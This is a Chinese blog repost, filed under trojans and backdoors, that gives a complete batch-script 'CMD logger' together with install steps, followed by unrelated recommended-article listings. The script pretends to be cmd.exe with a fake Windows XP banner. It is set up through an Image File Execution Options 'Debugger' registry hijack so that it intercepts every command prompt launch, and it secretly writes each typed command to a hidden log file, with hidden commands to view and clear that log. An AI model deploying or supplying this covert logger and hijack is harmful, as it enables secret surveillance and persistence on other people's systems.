CMD记录器改良版

最新推荐文章于 2024-06-07 17:15:49 发布
最新推荐文章于 2024-06-07 17:15:49 发布
阅读量6.6k 收藏 1
点赞数
分类专栏: 木马后门 密码算法 原创文章 Bat Man 文章标签: cmd system file c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/1807169
版权
 文章作者:a11yesno
信息来源:邪恶八进制信息安全团队( www.eviloctal.com

改的不是很良 勉强可用
或许应该弄多一点容错代码 体力活啊。。
安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif
注册表 添加
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cmd.exe
字串 Debugger
字串内容 cmd.gif /c cmd.bat



 

@echo   off  
title %ComSpec% 
 rem  CMD 记录器 改良版 
rem  原作者 superjj(可能是马甲!) 
rem  原文的地址:https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html 
rem  由我allyesno 改良(是本人不是马甲!) 
rem  容错代码就不改良了,一些细节部分自己添加! 
setlocal  EnableDelayedExpansion 
 echo  Microsoft Windows XP [版本  5.1 . 2600
echo   ( C )  版权所有  1985 - 2001  Microsoft Corp .  
 echo .  
 for   / l %%i in  ( 0 , 0 , 0 )   do   (  
   set   / p strCMD = % cd %^ >  
 if   " !strcmd! " == " whoami "   echo  allyesno& set  strcmd =  
 if   " !strcmd! " == " log "   type  %windir% history . txt& set  strcmd =  
 if   " !strcmd! " == " logclear "   del  %windir% history . txt& set  strcmd =  
   for   / " delims= "  %%i in  ( " !strCMD! " )   do   echo  %%i  >> %windir% history . txt 
  !strCMD! 
   echo .  
                         )

freexploit
关注
专栏目录
目标检测YOLO实战应用案例100讲-基于深度学习的航拍图像YOLOv5目标检测(论文篇)(续)
qq_36130719的博客
04-16 437
指标算法是一种特征被强化的完全无参考图像质量评价方法,从多个角度提取自然 图像中的特征,学习并构造多元高斯模型(Multivariate Gaussian, MVG),利用得到的。知,原YOLOv5网络中的CSP模块都被G-bneck模块替代,而Neck中的Conv层也被DWConv层做替代,由于本文的研究对象是航拍图像,为了增加对小目标的检。要性,有利于提高模型的泛化性,但是对批次大小的要求较为苛刻,当批次大小的 取值较小时,模型的错误率较高,严重影响实验的效果。根据工作环境及设备配置。
Netty学习Flag
Kevan的博客
03-27 364
Netty学习Flag 先把Netty权威指南看一遍,看完记录心得体会 再看Netty源码,贴出重要的源码与使用示例,总结
【网络编程】Trojan源码 文件传输+远程cmd+键盘记录
弱菜zc
02-24 1893
Trojan可以实现三个功能,分别为文件传输,远程执行cmd,键盘记录。其中键盘记录功能没有利用hook函数,有较强的隐蔽性。 现在给出源码: server: // server.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include #include #include #include #inc
cmd命令记录
weixin_34032621的博客
09-05 124
一、查看端口号的使用情况 参考经验:https://jingyan.baidu.com/article/3c48dd34491d47e10be358b8.html 1.netstat -ano,列出所有端口的情况,在列表中我们观察被占用的端口,比如是49157,首先找到它。2.查看被占用端口对应的PID,输入命令:netstat -aon|findstr "49157",回车,记下最后一位数字...
Cmder】--- Windows 系统的CMD多窗口、有历史记录神器 (超详细 持续更新中)
最新发布
月少的专栏
06-07 477
cmder_mini.zip 便携式、所谓绿色版本。cmder.7z是安装部,70M,功能比较全。
电脑CMD命令记录
zhoushangshi的博客
05-07 1272
打开运行编辑框的快捷方式 WIN+R 查看电脑开机启动命令:msconfig 清屏:CLS
命令行操作记录工具
zjyjust_for_fun的博客
12-27 619
script工具可以记录shell回话。 在命令行输入“script”,系统将会提示"Script started,file is typesctript"。接下来随便输入几个命令,用户在命令行的操作会自动保存在typesctript文件中。 使用exit命令终止script会话。用"cat typescript"来显示之前记录的内容。 例如::~$ script 脚本已启动,文件为 ty
MySQL 数据库基础 改良
wangzh__的博客
06-23 246
一.数据库简介 1.数据和数据库定义 2.数据库发展阶段 3.数据库系统组成 4.关系型数据库 1.1 数据库简介: 数据 广义的理解数据,它包含很多的种类,如文字、图形、图像、声音以及学生的档案记录 等,这些都是数据。 数据库 数据库(DataBase,DB)是按照数据结构来组织、存储和管理数据的仓库,是一个长期存储在计算机...
Django|编写第一个Django程序|Writting your first Django app|Windows环境
m0_59010789的博客
07-19 914
Django|编写第一个Django程序|Writting your first Django app|Windows环境|详细示范|多图预警
pb_ds(Policy-Based Data Structures)
追风蹑影
07-18 2516
参考:http://blog.csdn.net/wjf_wzzc/article/details/38851703 《C++的pb_ds库在OI中的应用》大连市第二十四中学 于纪平 http://blog.csdn.net/wmdcstdio/article/details/44596305 一、 pb_ds 库全称 Policy-Based Data Structures It
简单的键盘记录器
05-26
默认在D盘根目录下生成记录文件log.txt。
惠普cq41装win7系统亮度无法调节解决办法
06-24
惠普cq41装win7系统亮度无法调节解决办法!
HP笔记本BISO DMI
03-30
HP系列笔记本,在刷新BIOS或更换主板后,会出现机器机型号、产品号和序列号,甚至网卡MAC地址,丢失的情况;出现此类故障后,机器会运行不正常或相应程序无法安装;解决的办法就是重写相应数据,这里就需要使用HP的DMI专用工具-HP DMI SLP,其实也是网友常说的NbDmiFit程序。虽然大家都知道可以使用DMI工具恢复HP UUID等相关数据,但是如何操作,却一直没有详细的说明产。
CPQTAG 老版本
01-04
CPQTAG 老版本!
HP SLIC 打开安装正版win7(惠普2230s测试成功)
04-19
HP SLIC 打开安装正版win7(惠普2230s测试成功)
De-DOSfuscator一款对cmd.exe执行命令进行记录的工具
systemino的博客
05-11 801
前言 flare-qdb是由fireeye开发,旨在帮助分析人员提高分析效率。flare-qdb是一个命令行工具,基于python开发,其中的虚拟代码执行使用了python的vivisect库,工具可以很方便的用来查询和改变二进制样本运行时的状态变量,同时也可使用系统模拟等。我之前写过关于一篇题为“如何使用flare-qdb来检测和修改恶意软件行为”的文章。 当时Flare-qdb还刚刚在一些技...
记录一些 用过的 cmd 命令
bitwater的空间
12-14 484
//刷新dns system("ipconfig /flushdns"); //刷新网络 ( 可能要重启 ) system("netsh winsock reset"); WinExec("SystemPropertiesPerformance.exe",SW_SHOW ); //设置ip 掩码 网关 system ( "netsh interface ip set address \"本
Cmder--windows 系统命令行神器
MaRain
10-16 2048
介绍CMDER--免费的window下比较 优美的 命令行工具 官网:http://cmder.net/添加到环境变量为了可以直接运行这个程序,需要在window的环境变量添加上cmde添加到右键进入cmder的根目录执行注册要右键菜单即可。D://cmder Cmder.exe /REGISTER ALL 运行这个就可以好的功能可以多窗口 可以快捷键粘贴复制添加ll等命令在cmder->con
Windows CMD命令速查手册PDF版
"CMD命令速查手册2,pdf版" 这篇PDF文档是CMD命令速查手册的第二版,专为用户提供Windows命令行环境(CMD)下的常用命令参考。CMD命令是Windows操作系统中的命令行工具,允许用户执行各种系统操作,如管理文件、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值